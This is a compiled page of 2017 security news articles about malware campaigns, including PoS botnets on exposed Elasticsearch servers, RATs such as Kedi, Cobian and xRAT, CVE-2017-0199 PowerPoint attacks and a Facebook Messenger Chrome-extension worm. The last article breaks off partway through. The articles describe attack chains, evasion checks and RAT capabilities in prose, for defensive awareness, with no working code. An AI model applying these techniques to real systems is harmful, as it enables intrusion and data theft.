- Virus -

Last update 09.10.2017 13:47:12

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6 

Thousands of Elasticsearch installs compromised to host PoS Malware
15.9.2017 securityaffairs

Experts discovered 4,000 compromised installations on Amazon AWS of open source analytics and search tool Elasticsearch that were running PoS malware.
Security researchers from the firm Kromtech have discovered 4,000 compromised instances of open source analytics and search tool Elasticsearch that were running PoS malware.

According to Kromtech, this is just a portion of the overall number of compromised servers. Expert Bob Diachenko from Kromtech reported those servers are just 27 per cent of a total of 15,000 unsecured Elasticsearch installations discovered by the firm, and 99 per cent of the infected servers are hosted on Amazon AWS.

pos malware Elasticsearch

Amazon Web Services provides customers with a free T2 micro (EC2 / Elastic Compute Cloud) instance with up to 10 Gb of disk space, but clearly, customers are not able to properly secure the installs.

AWS offer only includes Elastisearch versions 1.5.2 or 2.3.2, and unfortunately, users skip all security configuration during the quick installation process. Due to the poor settings are chosen by the operators, the malware is running with full administrative privilege on the compromised systems

“The Amazon hosting platform gives users the possibility to configure the ElasticSearch cluster just in few clicks, but usually, people skip all security configuration during the quick installation process. This is where a simple mistake can have big repercussions and in this case it did by exposing a massive amount of sensitive data.” wrote Diachenko.

The company found command-and-control servers for Alina and JackPoS point-of-sale malware running on the compromised Elasticsearch installs.

Threat actors are managing a big POS Botnet with Command and Control (C&C) that collects credit card information stolen from payment systems.

“The lack of authentication allowed the installation of malware on the ElasticSearch servers. The public configuration allows the possibility of cyber criminals to manage the whole system with full administrative privileges. Once the malware is in place criminals could remotely access the server’s resources and even launch a code execution to steal or completely destroy any saved data the server contains.” continues Diachenko.

Below the key findings of the research conducted by Kromtech:

There are different packages of C&C malware, i.e. servers were infected multiple times

Different packages can be related to different Botnets (because POS malware was seen selling not only on Darknet but on public domains as well)

There is a lot of servers infected, for the same packages on different servers the time of infection could be different due to periodical scans and Botnets network expansion

Nearly 99% of infected servers are hosted on Amazon Web Services

52% of infected servers run Elastic Search 1.5.2 version, 47% – 2.3.2 version, and 1% for other versions.

Recent infections were made at the end of August 2017

Sysadmins must urgently check their Elasticsearch installs, analyze the connections and traffic, and check the presence of the PoS malware. In case of compromised installs, they can provide the sample to Kromtech before reinstalling the systems and apply patches as required.

New Attack Abuses CDNs to Spread Malware

14.9.2017 securityweek Virus
Content delivery networks (CDNs) are being increasingly abused to spread malware, courtesy of standards that allow the download and execution of payloads on computers, ESET warns.

The security firm analyzed the downAndExec standard, which makes extensive use of JS scripts and enables the download and execution of malware. In one attack, miscreants were observed using the standard and abusing CDNs to deliver banking threats to users in Brazil, the researchers reveal.

The attack chain starts with social engineering techniques being used to trick victims into executing a malicious application detected as NSIS/TrojanDropper.Agent.CL. This is a malware downloader designed to fetch a single snippet of externally-hosted JS necessary to supplement the execution process.

The JS snippet is hosted on the infrastructure of a CDN provider, which not only provides high bandwidth for payload delivery and command and control (C&C) operations, but also ensures that takedown attempts aren’t immediately successful, as it is impracticable to block the entire CDN domain.

Searching for indicators of compromise is also difficult in such cases, as the affected environments might have a large number of access records made by non-malicious software, the security researchers say.

After the content of said JS snippet is fetched, a function is called to add to the end of the JS snippet a string containing “downAndExec” and two parameters representing the URL where the C&C is hosted, and “x-id” data, which is necessary to download other payloads.

The researchers also discovered that in addition to obfuscation, protection against sandboxing has been implemented as well. Thus, the malicious code isn’t executed if the JS snippet is analyzed separately. Moreover, the script performs a series of checks before executing malicious functions, to make sure that the target machine is of potential interest.

The malware checks for various files, after which it starts looking for folders associated with banking programs such as Bradesco, Itaú, Sicoob and Santander. The researchers suggest that this check is probably intended to prevent activation of malicious functions on computers that are not used for online banking.

Finally, the malware also checks whether the target computer is located in Brazil. This shows that the attack is targeted and might also be meant to avoid analysis. The snippet verifies that the customer IP is from a Brazilian AS (autonomous system).

Should the computer meet all conditions, the malware initiates communication with the C&C, which results in the final compromise being performed. In the analyzed incident, the malware downloaded three files, one of which is a banking Trojan.

“As we have seen, the downAndExec technique involves two download stages and several protections, either to identify machines matching the desired profile, or to distribute malicious code in ‘sterile’ sections, which on their own do not execute (in order to bypass online protections), but which, when joined with other pieces of malicious code, are capable of compromising a victim’s computers,” ESET concludes.

New Kedi RAT Uses Gmail to Exfiltrate Data

13.9.2017 securityweek  Virus
Kedi RAT Pretends to be a Citrix Utility, Transfers Data Using Gmail

A newly discovered remote access Trojan (RAT) capable of evading security scanners communicates with its command and control (C&C) server via Gmail, Sophos has discovered.

Dubbed Kedi, the RAT was designed to steal data and is being spread via spear-phishing emails, the security researchers say. The observed attacks appear targeted with the malicious payload masquerading as a Citrix utility.

The RAT’s capabilities aren’t out of the ordinary: AntiVM/anti-sandbox features, the ability to extract and run embedded secondary payloads, file download/upload backdoors, screenshot grabbing, keylogging, and the ability to extract usernames, computer names, and domains. According to Sophos, most of these features are command-driven.

What makes the Trojan stand out from the crowd, however, is its ability to communicate with its C&C using Gmail (the Basic HTML version). Nonetheless, the malware can also talk to the server using DNS and HTTPS requests, the security researchers have discovered.

“Using Gmail to receive instructions from its C&C, Kedi navigates to the inbox, finds the last unread message, grabs content from message body and parses commands from this content. To send information back to command and control, base64 encodes the message data, replies to the received message, adds encoded message data and sends its message,” Sophos reveals.

The spear-phishing attack distributing the threat was observed last week. While Kedi doesn’t appear to have been involved in a widespread campaign to date, it could end up targeting more users soon, Sophos warns.

To stay protected, users should pay close attention when clicking on links or opening files they receive via email from unknown sources. Users are also advised to keep operating systems and applications up to date at all time, as well as to use and maintain an anti-virus application.

Linux Malware Could Run Undetected on Windows: Researchers

13.9.2017 securityweek Virus
A new Windows 10 feature that makes the popular Linux bash terminal available for Microsoft’s operating system could allow for more malware families to target the operating system, Check Point researchers claim.

Called Windows Subsystem for Linux (WSL), the feature exited beta a couple of months ago and is set to become available to all users in the upcoming Windows 10 Fall Creators Update (FCU), set to be released by Microsoft in October 2017.

The feature brings the Linux command-line shell to Windows, thus allowing users to natively run Linux applications on Windows systems. Because of that, Check Point researchers argue, malware designed for Linux can slip undetected onto Windows computers.

Called Bashware, the new attack technique could be abused even by known Linux malware, because anti-malware solutions for Windows haven’t been configured to detect such threats, the security researchers argue.

“Existing security solutions are still not adapted to monitor processes of Linux executables running on Windows OS, a hybrid concept which allows a combination of Linux and Windows systems to run at the same time. This may open a door for cyber criminals wishing to run their malicious code undetected, and allow them to use the features provided by WSL to hide from security products that have not yet integrated the proper detection mechanisms,” Check Point says.

The security researchers claim they have already tested the attack technique on “most of the leading anti-virus and security products on the market,” and managed to successfully bypass all of them. Because of that, they claim, “Bashware may potentially affect any of the 400 million computers currently running Windows 10 PC globally.”

The risks posed by WSL, however, are mitigated by the fact that the user needs to manually enable the feature and reboot the system. Malware that wants to abuse the feature would need to enable developer mode on Windows, which is disabled by default, and even download and extract the Linux file system from Microsoft’s servers.

Check Point says the necessary features could be silently enabled in the background, thus setting up the necessary environment without user’s knowledge. Moreover, they say they were able to run Windows-based malware in the newly set up environment.

The researchers also point out that the newly discovered attack technique doesn’t leverage an implementation flaw, but that the lack of awareness by various security vendors is the actual issue here.

“However, we believe that it is both vital and urgent for security vendors to support this new technology in order to prevent threats such as the ones demonstrated by Bashware,” Check Point says.

According to Microsoft, however, the risks posed by such an attack are low, given that the features required to run Linux apps on Windows are disabled by default.

“We reviewed and assessed this to be of low risk. One would have to enable developer mode, then install the component, reboot, and install Windows Subsystem for Linux in order for this to be effective. Developer mode is not enabled by default,” a Microsoft spokesperson told SecurityWeek via email.

Contacted by SecurityWeek, anti-malware vendor Kaspersky Lab confirmed in an emailed statement that they are aware of the potential risks posed by WSL and that they are already working on the technology necessary to detect any malware that could abuse it.

“Kaspersky Lab is aware of the possibility to create malware for Windows Subsystem for Linux (WSL) and is working on technologies to detect this type of malware on user devices. In fact, in 2018, all Kaspersky Lab solutions for Windows will be updated with special technologies that detect behaviorally and heuristically and block any Linux and Windows threats when WSL mode is on. Currently, all Kaspersky Lab frontline solutions for Windows can detect downloaders and Windows parts of Linux malware,” Kaspersky Lab said.

SentinelOne Enables IOC Search and Threat Hunting for Endpoints

8.9.2017 securityweek Virus
SentinelOne Launches Deep Visibility Module to Discover Indicators of Compromise (IOCs) on Endpoints

Malware increasingly uses encryption to hide its activities. If defenders cannot see what is inside encrypted traffic, they can have no idea of whether it is malicious or benign. Since more than half, and growing, of all traffic is now encrypted, it is increasingly important for defenders to gain visibility into that traffic.

Next-gen AI-powered endpoint protection and response firm SentinelOne yesterday launched a new module to provide that visibility. Called Deep Visibility, it uses the kernel hooks already present in the SentinelOne Endpoint Protection Platform to see the cleartext traffic at the point of encryption, and again at the point of decryption. Detecting the presence of malware through recognition of malicious encrypted traffic then allows the security team to pivot to the response part of the SentinelOne platform and take remedial action.

Rajiv Raghunarayan, SentinelOne's VP of product marketing, told SecurityWeek that this approach was taken to avoid adding overhead to the endpoints. "Our kernel hooks give us the ability to extract the traffic at the point of encryption or at the point of decryption. This does not require any additional agent on the endpoint -- the hooks already exist as part of our base engine; we do not need any additional processing."

The SentinelOne view is that security -- combining endpoint protection and response -- is all about visibility to first see the threats and then be able to respond to them. "We started out with a base engine that looks at threats from a prevention and detection and response perspective: prevent when we can; detect where we can't (for example, any fileless threats that get through prevention such as the recent WannaCry and NotPetya worms)," said Raghunarayan.

But how do you detect/protect against threats that are sometimes only detectable at the point of execution?

"Here we observe malicious characteristics on execution. All of this is based on AI technology that examines behavior -- file characteristics, process execution characteristics, registry, pages, memory etcetera," Raghunarayan said. "Finally, we pivot from detection to response -- I've detected a threat but now I need to respond to it. I can't allow ransomware to start encrypting my files just because there's no-one available to respond to the alert. So, we can contain the system automatically: we could quarantine the system or the file; we could kill the process; we could remediate (undo the changes caused by the malware), or we could roll back the system to a known previous good state."

But encryption remains a blind spot and a weakness for most defenses. This is the issue tackled by the firm's new Deep Visibility module.

The traditional route for seeing into encrypted traffic is to decrypt it at a firewall and examine it there in a sort of benign man-in-the-middle attack. "We don't need some form of man-in-the-middle decryption to see what is happening," said Raghunarayan. "If decryption is done at the firewall, the performance of both the firewall and the endpoint is impacted -- and one thing you must never do at the endpoint is drop its performance."

By using SentinelOne's existing endpoint protection and response engine, the firm has increased security analysts' view into potential threats without requiring an additional agent on the endpoint. "We did need to do extra work to be able to see into Chrome's own proprietary encryption/decryption engines; but the result allows us complete visibility into the endpoint."

"We are bringing visibility into every edge of the network -- from the endpoint to the cloud," said Tomer Weingarten, CEO of SentinelOne. "Deep Visibility enables search capabilities and visibility into all traffic, since we see it at the source and monitor it from the core. We know that more than half of all traffic is encrypted -- including malicious traffic -- which makes a direct line of sight into all traffic an imperative ingredient in enterprise defense."

The user can pivot from this deeper visibility into the response part of the SentinelOne engine. "If endpoints are seen displaying worrying characteristics, the security analyst can either immediately stop those endpoints from connecting to the network to spread an infection; or just roll back the endpoints if they display ransomware characteristics. The whole purpose is to provide the analysts with extra insight -- it helps with both IOC searching and also threat hunting," added Raghunarayan.

The Dridex banking trojan is a good example of the need for this extra visibility, since it makes extensive use of encryption -- including encrypting the data it exfiltrates. While existing security may be able to detect the presence of Dridex, simply blocking or removing it may be too late. Without visibility into the data that has been exfiltrated, the analysts may miss continuing threats. For example, if Dridex has already stolen and exfiltrated credentials, the analysts need to know which credentials have been lost.

"Deep Visibility is a breakthrough that will re-define how we think about perimeters," said Weingarten. "Gaining visibility into the data pathways marks the first milestone for a real, software-defined edge network that can span through physical perimeters, to hybrid datacenters and cloud services."

SentinelOne raised $70 million in a Series C funding round in January 2017.

Hackers Are Distributing Backdoored 'Cobian RAT' Hacking tool For Free
7.9.2017 thehackernews

Nothing is free in this world.
If you are searching for free ready-made hacking tools on the Internet, then beware—most freely available tools, claiming to be the swiss army knife for hackers, are nothing but a hoax.
Last year, we reported about one such Facebook hacking tool that actually had the capability to hack a Facebook account, but yours and not the one you desire to hack.
Now, a Remote Access Trojan (RAT) builder kit that was recently spotted on multiple underground hacking forums for free found containing a backdoored module that aims to provide the kit's authors access to all of the victim's data.
Dubbed Cobian RAT, the malware has been in circulation since February of this year and has some similarities with the njRAT and H-Worm family of malware, which has been around since at least 2013.
According to ThreatLabZ researchers from Zscaler, who discovered the backdoored nature of the malware kit, the "free malware builder" is likely capable of allowing other wannabe hackers to build their own versions of the Cobian RAT with relative ease.
Once the criminals create their own version of malware using this free builder, they can then effectively distribute it via compromised websites or traditional spam campaigns to victims all over the world and is capable of recruiting affected devices into a malicious botnet.
The Cobian RAT then steals data on the compromised system, with the capability to log keystrokes, take screenshots, record audio and webcam video, install and uninstall programs, execute shell commands, use dynamic plug-ins, and manage files.
Cyber Criminals Want to Hack Wannabe Hackers
Now, if you get excited by knowing that all these capabilities offered by the original authors of the malware builder kit are free as they claim, you are mistaken.
Unfortunately, the custom RATs created using this free Cobian RAT malware builder kit has a hidden backdoor module, which silently connects to a Pastebin URL that serves as the kit authors' command-and-control (C&C) infrastructure.
The backdoor, at any time, can be used by the original authors of the kit to issue commands to all RATs built on the top of their platform, eventually putting both wannabe hackers and compromised systems infected by them at risk.
"It is ironic to see that the second level operators, who are using this kit to spread malware and steal from the end user, are getting duped themselves by the original author," Deepen Desai, senior director of security research at Zscaler, wrote in a blog post published Thursday.
"The original author is essentially using a crowdsourced model for building a mega Botnet that leverages the second level operators Botnet."
The researchers also explain that the original Cobian developer is "relying on second-level operators to build the RAT payload and spread infections."
The original author then can take full control of all the compromised systems across all the Cobian RAT botnets, thanks to the backdoor module. They can even remove the second-level operators by changing the C&C server information configured by them.
A recently observed unique Cobian RAT payload by the researchers reportedly came from a Pakistan-based defence and telecommunication solution website (that was potentially compromised) and served inside a .zip archive masquerading as an MS Excel spreadsheet.
The bottom line: Watch out the free online stuff very carefully before using them.

Experts Find 2007 Variant of Malware Linked to French Intelligence

7.9.2017 securityweek  Virus
Researchers at Palo Alto Networks have come across a 2007 variant of Babar, a piece of malware believed to have been developed by a French intelligence agency.

The activities of the cyber espionage group known as the Animal Farm came to light in March 2014, when a French publication released a series of slides from Edward Snowden. The slides belonged to Canada's Communications Security Establishment (CSE) and they detailed an espionage campaign dubbed “Operation Snowglobe.”

Further analysis by various security firms revealed that the Animal Farm group had been using several pieces of malware whose names have been inspired by cartoon characters, including Babar, Dino, Casper and Bunny. Other malware families used by the threat actor are NBot and Tafacalou.

The group, previously believed to have been active since at least 2009, has targeted government organizations, military contractors, private firms, media companies, activists, and humanitarian aid organizations in many countries around the world.

Back in 2015, Kaspersky mentioned that it had found evidence of some Animal Farm malware being developed as far back as 2007, but the company did not share any details. Palo Alto Networks now says it has found a 2007 version of Babar, also known as Snowball. Researchers pointed out that the previously analyzed samples of this malware had dated back to 2011.

“Analysing historical malware samples helps us learn about its set of features and technical capabilities. This helps us compare a tool used by one adversary to that used by similarly adversaries at that time,” Palo Alto’s Dominik Reichel said in a blog post.

Researchers analyzed a loader with a compilation timestamp of 11/09/2007 11:37:36 PM and a payload apparently compiled 10 seconds later. While timestamps can be modified, experts believe these are genuine.

This version of Babar was capable of obtaining information about the compromised machine, rebooting or shutting down the infected system, downloading files, and killing arbitrary processes. When obtaining information on the default Web browser, the malware uses a method that does not work on Chrome, which Google released in 2008, further indicating that the samples were truly developed in 2007.

Researchers also pointed out that the malware had abused the official website of the Permanent Council of Accounting of the Democratic Republic of the Congo (cpcc-rdc.org) for command and control (C&C) communications.

Experts also found a design flaw that resulted in configuration data that should have been encrypted to be accessible in clear text, which is surprising considering that the malware was developed by a sophisticated actor.

Code and structure analysis suggests that the Casper malware used by Animal Farm is based on this version of Babar.

Overall, Palo Alto Networks believes this piece of malware is “only average” compared to other malware created at that time by threat groups believed to be backed by nation states, such as Regin or Careto.

The theory that a French intelligence agency is behind the Animal Farm is based on information from the CSE slides, the targeted entities, language and regional settings, and various strings found in the malware code. Palo Alto Networks’ analysis also found that the loader and the main payload for the 2007 version of Babar had the resource language ID set to 1036, which corresponds to French.

Targeted Attacks Leverage PowerPoint File for Malware Delivery

7.9.2017 securityweek  Virus

Threat actors are leveraging malicious PowerPoint files and a recently patched Microsoft Office vulnerability to target UN agencies, foreign ministries, international organizations, and entities interacting with international governments, Fortinet warns.

The attack uses a file named ADVANCED DIPLOMATIC PROTOCOL AND ETIQUETTE SUMMIT.ppsx and exploits the CVE-2017-0199 vulnerability that Microsoft addressed in April, after malicious actors had been abusing it to deliver malware such as Dridex, WingBird, Latentbot and Godzilla. The exploit has been and continues to be used in attacks even after patching.

Last month, the first PowerPoint attacks to exploit CVE-2017-0199 for malware delivery emerged, associated with the distribution of a Trojanized version of the REMCOS legitimate and customizable remote access tool (RAT).

Once the PowerPoint Slide Show is opened, it triggers a script and the exploit downloads remote code from an XML file with JavaScript code from the domain narrowbabwe[.]net. Next, it executes the code using the PowerPoint Show animations feature, Fortinet explains.

The exploit is also able to bypass the User Account Control feature in Windows, by hijacking the registry and then executing eventvwr.exe. The bypass technique was first detailed in August 2016.

The JavaScript inside the XML file would write a file in a directory, masquerading as a legitimate Microsoft Office patch. This, however, is a piece of malware executed with high privilege, which uses WMI ActiveScriptConsumers for persistence. Courtesy of a timer event, the script runs every 12 seconds.

The script also tries to identify if it runs in a virtual environment. If it doesn’t detect a virtual machine, the script proceeds to sending some data to a remote server.

Although the command and control (C&C) server had been already taken down at the time of analysis, the researchers say that the response from the C&C contains arbitrary commands executed with eval() function. After executing the commands the script sends a notification to the server.

“These commands can possibly be download functions to deliver the final payload, and the most commonly used malware for espionage are RATs (Remote Access Trojans),” Fortinet suggests.

Last month, Cisco discovered that attackers were combining Office exploits to avoid detection and ensure higher delivery rate. Fortinet’s new report shows that actors can implement multiple techniques in a single piece of code to evade detection, bypass protections, and escalate privilege. The use of multiple embedded encoded scripts, multiple stages of URL connection, and the embedding of C&C URLs in a jpg file reveal the work of persistent criminals.

Lenovo Settles FTC Charges Over Superfish Adware

6.9.2017 securityweek Virus
Lenovo has reached a settlement with the U.S. Federal Trade Commission (FTC) and Attorneys General in 32 states regarding the company’s decision to preinstall man-in-the-middle (MitM) software on its laptops.

The proposed settlement is subject to public comment until October 5, but if made final, Lenovo will not have to pay any fine. Instead, the company will be prohibited from misrepresenting the features of preloaded software that injects ads into browsing sessions or sends sensitive user data to third parties.

Lenovo is also required to obtain affirmative consent before activating such software, and it must maintain a comprehensive security program for preinstalled applications for a period of 20 years. This program will be subject to third-party audits.

The FTC filed a complaint against Lenovo back in 2015, after security experts discovered that a browser add-on named WindowShopper (VisualDiscovery) from Superfish had been injecting ads into web pages visited by Lenovo laptop owners by using a local proxy and a self-signed root certificate. The application was reportedly installed on hundreds of thousands of laptops in late 2014 and early 2015.

The application basically launched an MitM attack on users’ browsing sessions, allowing it to intercept sensitive information transmitted over the Web. Experts also raised concerns that by replacing legitimate certificates with its own, the Superfish software exposed users to malicious websites that leveraged fake certificates.

The FTC accused Lenovo of failing to inform users that the software acted as an MitM component, activating the software without adequate notice or informed consent, and failing to take measures to assess and address the security risks introduced by the application.

“While Lenovo disagrees with allegations contained in these complaints, we are pleased to bring this matter to a close after 2-1/2 years,” Lenovo said in a statement posted on its website.

“After learning of the issues, in early 2015 Lenovo stopped preloading VisualDiscovery and worked with antivirus software providers to disable and remove this software from existing PCs,” the company said. “To date, we are not aware of any actual instances of a third party exploiting the vulnerabilities to gain access to a user’s communications. Subsequent to this incident, Lenovo introduced both a policy to limit the amount of pre-installed software it loads on its PCs, and comprehensive security and privacy review processes, actions which are largely consistent with the actions we agreed to take in the settlements announced today.”

While members of the FTC unanimously accepted the agreement, Commissioner Terrell McSweeny issued a separate statement pointing out that the agency should have also added a charge related to Lenovo deceptively omitting that the software would alter users’ Internet experience. FTC Acting Chairman Maureen K. Ohlhausen does not agree with McSweeny’s view.

Autodesk A360 Drive Used to Spread Malware

6.9.2017 securityweek Virus
Cloud-based online storage service Autodesk A360 Drive has been recently abused as a malware delivery platform, according to Trend Micro.

Functioning in a manner similar to that of cloud storage services such as Google Drive, A360 Drive allows a user to create an account for free and benefit from 5 gigabytes of storage space. The service is part of the Autodesk A360 cloud-based workspace, which allows design and engineering teams to share information to desktops, web, and mobile devices.

On A360 Drive, anyone can upload documents via a browser or desktop, and can also share these files by inviting people to view or edit them. Thus, all that a cybercriminal needs to do to abuse the service is to create an account, upload malicious content, and then embed URLs to this content in the chosen entry vector.

In fact, this is exactly what Trend Micro discovered has happened. Miscreants uploaded a plethora of malware to A360 Drive and started spreading it via macro-enabled Microsoft Word documents and other types of files.

One A360 Drive-hosted archive, the security firm says, included an executable (.EXE) file embedded with an obfuscated Visual Basic file hiding a Zeus/Zbot KINS variant beneath. One Java ARchive (JAR) file discovered on the platform contained an executable file archive that pointed to a variant of the NETWIRE remote access tool.

Another JAR file was found to be a variant of jRAT/Adwind, a piece of malware that can retrieve and exfiltrate a variety of data, including credentials, keystrokes, and multimedia files.

According to Trend Micro, some of the files were hosted via A360 Drive since June 2017, but the practice only surged in August. These files usually contained remote access tools, either obfuscated EXE files or Java archives, and haven’t been used in targeted attacks to date.

When it comes to the global distribution of the observed malware, the U.S., South Africa, France, Italy, Germany, Hong Kong, and Austria emerge as the most affected countries.

One of the analyzed files was an Office DOC document called AMMO REQUEST MOD Turkey.doc, which was uploaded to VirusTotal on August 24 and was distributed during the same period. Malicious macros included in the document were pointing to a PowerShell script designed to download a file from A360 Drive and execute it.

The downloaded payload, a Visual Basic obfuscated executable file, was found to be the Trojanized version of the Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums. The malware was being distributed mainly in European countries such as Croatia, Germany, Greece, and Turkey.

Remcos made headlines in February, but it has been used in attacks since 2016. Recently, the RAT has been distributed via a malicious PowerPoint slideshow embedded with an exploit for CVE-2017-0199. In March, the same tool was found on endpoints infected with the MajikPOS point-of-sale (PoS) malware. Apparently, it was used as MajikPOS’s entry point.

“Securing the use of legitimate system administration tools like PowerShell helps mitigate threats and restrict them from being abused. Cloud-based storage platforms are known for being abused, too, and its misuse often allows malicious artifacts into the workplace’s machines. This can be prevented by ensuring that web traffic is scanned within the enterprise,” Trend Micro notes.

The security firm informed Autodesk on its findings and says they have been working together in taking “down the abused URLs and deploying additional countermeasures to prevent further abuse of A360 Drive.”

Experts discover a new sophisticated malware dubbed xRAT tied to mRAT threat
6.9.2017 securityaffairs

Researchers at Lookout spotted a new mobile remote access Trojan dubbed xRAT tied to 2014 “Xsser / mRAT” surveillance campaign against Hong Kong protesters.
A new mobile remote access Trojan dubbed xRAT includes appears as the evolution of high-profile spyware Xsser / mRAT malware that was first spotted in late 2014 when it was used in a surveillance campaign against Hong Kong protesters.

“Lookout researchers have identified a mobile trojan called xRAT with extensive data collection functionality and the ability to remotely run a suicide function to avoid detection. The malware is associated with the high-profile Xsser / mRAT malware, which made headlines after targeting both iOS and Android devices of pro-democracy Hong Kong activists in late 2014.” reads the analysis published by Lookout.

xRAT has many similarities with mRAT, it has the same structure and uses the same decryption key. The analysis of the code revealed that both malware uses the same naming conventions that suggest both malicious codes were developed by the same threat actor.

xrat malware

According to researchers from security firm Lookout, the command and control (C&C) servers used for the xRAT malware is the same of a Windows malware, a circumstance that suggests the threat actor is composed of experienced experts.

The xRAT mobile Trojan seems to be specifically developed to target political groups, it includes detection evasion and implements common spying features, including the ability to gather data from instant messaging applications such as WeChat and QQ.

“Like mRAT, xRAT supports an impressive set of capabilities that include flexible reconnaissance and information gathering, detection evasion, specific checks for antivirus, app and file deletion functionality, and other functionality listed below. It also searches for data belonging to popular communications apps like QQ and WeChat. The threat actors themselves are able to remotely control much of its functionality in real time (e.g., which files to retrieve and what the settings of its automatic file retrieval module should be). ” continues the analysis.

Below the complete list of features implemented by the xRAT mobile malware.

Browser history
Device metadata (such as model, manufacturer, SIM number, and device ID)
Text messages
Call logs
Data from QQ and WeChat
Wifi access points a device has connected to and the associated passwords
Email database and any email account username / passwords
Device geolocation
Installed apps, identifying both user and system applications
SIM Card information
Provide a remote attacker with a shell
Download attacker specified files and save them to specified locations
Delete attacker specified files or recursively delete specified directories
Enable airplane mode
List all files and directories on external storage
List the contents of attacker specified directories
Automatically retrieve files that are of an attacker specified type that are between a minimum and maximum size
Search external storage for a file with a specific MD5 hash and, if identified, retrieve it
Upload attacker specified files to C2 infrastructure
Make a call out to an attacker specified number
Record audio and write it directly to an already established command and control network socket
Executes attacker specified command as the root user
Downloads a 22MB trojanized version of QQ from hiapk[.]com, saving it to /sdcard/.wx/wx.apk. Referred to as ‘rapid flow mode’.
To avoid detection, the xRAT implements a “suicide” function that could be triggered to clean the installation on the infected mobile device. The malicious code for specific antivirus applications and alert its operators in the case they are present:

管家 (housekeeper)
安全 (safety)
权限 (Authority)
卫士 (Guardian)
清理 (Cleanup)
杀毒 (Antivirus)
xRAT can be remotely instructed to perform a wide range of deletion operations, such as removing large portions of a device or attacker-specified files like images from certain directories on the SDCard, all apps and data from /data/data/, and all system apps from /system/app/.

Most of the C&C infrastructure used by xRAT in the past were based in China, but sample recently analyzed by the company were located in the United States.

As anticipated, the C&C infrastructure also controlled a Windows malware, the experts also noticed a malicious executable named MyExam, this means that “the actors behind this family may be continuing to target students, similar to how attackers used mRAT during the protests in 2014.”

“The majority of command and control servers used by xRAT in the past have been based in China with some appearing in Hong Kong. After analyzing recently acquired samples, we further identified attacker infrastructure on the East Coast of the United States. This may indicate an expansion in deployment from the actor behind this family as they’ve previously used servers geographically close to regions where their tooling is being deployed.” continues the analysis.

xRAT Mobile Malware Emerges

5.9.2017 securityweek Virus
A recently discovered mobile remote access Trojan includes extensive data collection capabilities and is associated with known mobile and Windows-targeting threats, Lookout security researchers warn.

Dubbed xRAT, the malware appears to have evolved from the high-profile Xsser / mRAT malware that made headlines in late 2014. The newly discovered mobile threat features code structure almost identical to that of the mRAT family of malware, uses the same decryption key and certain heuristics and naming conventions that suggest the same actor has developed both of them.

Furthermore, the command and control (C&C) servers for the new mobile threat are also linked to Windows malware, suggesting that an experienced crime group is operating it. Earlier this year, security researchers discovered a free and open source remote access tool (RAT) named QuasarRAT that has evolved from the xRAT Windows malware.

The xRAT mobile Trojan, the security researchers say, appears to specifically target political groups and includes capabilities ranging from reconnaissance and information gathering, to detection evasion, antivirus checks, and app and file deletion functionality. The malware also gathers data from communications apps like QQ and WeChat and allows its operators to remotely control much of its functionality in real time.

On Android devices, the malware can exfiltrate browser history, device metadata, text messages, contacts, call logs, QQ and WeChat data, Wi-Fi access point information, email database and username / passwords, geolocation, list of installed apps, and SIM card information.

It can also provide the remote attacker with a shell, can download/delete attacker specified files, enable airplane mode, list all files and directories on external storage or the content of specified directories, retrieve files of an attacker specified type, search external storage, upload files to C&C, make phone calls, record audio, executes commands as the root user, and can also download a trojanized version of QQ.

To avoid detection, xRAT includes a function to terminate itself and clean out its installation directory before uninstalling itself. The malware checks for specific antivirus applications, alerting the operators if they are present on a compromised device.

The threat also includes a robust file deletion module that can remove “large portions of a device or attacker-specified files,” including images from certain directories on the SDCard, audio files from certain directories on the SDCard, specific input method editors (IME), and messaging apps. It can also wipe a device by deleting all files from the SDCard, all apps and data from /data/data/, and all system apps from /system/app/.

Most of the C&C servers used by xRAT in the past were based in China, while recent samples revealed attacker infrastructure in the United States as well. The infrastructure has Windows malware associated to it, including a malicious executable named MyExam, which Lookout says is an indication that “the actors behind this family may be continuing to target students, similar to how attackers used mRAT during the protests in 2014.”

Dissecting the Chrome Extension Facebook malware
3.9.2017 Kaspersky
Social  Virus

It’s been a few days since Kaspersky Lab’s blog post about the Multi Platform Facebook malware that was spread through Facebook Messenger. At the same time as Kaspersky Lab were analyzing this threat, a few researchers where doing the same, including Frans Rosén, Security Advisor at Detectify.

After Frans saw David’s tweet about the blog post, he called David and asked why they were both doing the same job. Frans had a good point, so they started to compare notes and found out that Frans had actually analyzed some of the parts that David hadn’t. They decided to jointly write this second part of the analysis, which is going to describe the attack in detail.

Spreading mechanism

Frans spent quite some time analyzing the JavaScript and trying to figure out how the malware was spreading, which might seem like a simple task but it wasn’t. There were multiple steps involved trying to figure out what the Javascript payloads did. Also, since the script dynamically decided when to launch the attack, it had to be monitored when the attackers triggered it.

The conclusions can be broken down into a few steps, because it’s not only about spreading a link, the malware also notifies the attackers about each infection to collect statistics, and enumerates browsers. We tried summarizing the steps as simply as possible below:
The victim receives a link on Facebook Messenger from a friend.
The link goes to Google Docs with an image that looks like a fake video player with the friend’s profile picture.
Clicking on that link using Chrome will send you to a fake YouTube page that asks you to install a Chrome Extension directly on the page.
Installing that Chrome Extension will then spread malicious links to the victim’s online friends, combined with the victim’s profile picture.
There are some interesting things in all these steps, so we will take a closer look below.

Technical details

Facebook message

The message itself will consist of the first name of the user that gets the message, the word “Video” and one of these emojis selected at random:

together with a link created with a URL shortener.

Google Docs shared PDF preview

Clicking on the link will redirect the user to a URL on docs.google.com. This link is made by using the preview link of a shared PDF, most likely because it is the quickest way to get a large controlled content area on a legit Google domain with an external link.

The PDF itself is created using PHP with TCPDF 6.2.13 and then uploaded to Google Docs using Google Cloud Services. Clicking the will send us to a page containing details about the PDF file being previewed.

The share settings are an interesting detail about the link created:

“Anyone can edit”. This configuration means that anyone who has the link can actually edit it. Looking at how these links spread, the attack reuses the same link for all the victim’s friends. One friend changing the access rights of the link could potentially prevent the attack from spreading to the victim’s other friends.

Another interesting detail is the user who created the file. Collecting a bunch of examples, we can see some patterns:

These were four links created for different victims, but three of them share the same IAM username (ID-34234) even though they were created using different Google Cloud Projects.

At the time of the attack, none of the URLs being linked from the PDF preview were blacklisted by Google.

Redirect party

After the Google Docs link is clicked, the user will go through a bunch of redirects, most likely fingerprinting the browser. Below, we will focus on Chrome as it is clear it was one of the targeted browsers for the spreading mechanism.

For the other browsers, ads were shown and adware was downloaded, read more about this under Landing Pages below.

Fake YouTube page with Chrome Extension installation

When using Chrome, you are redirected to a fake YouTube page. We noticed several different domains being used during the attack.

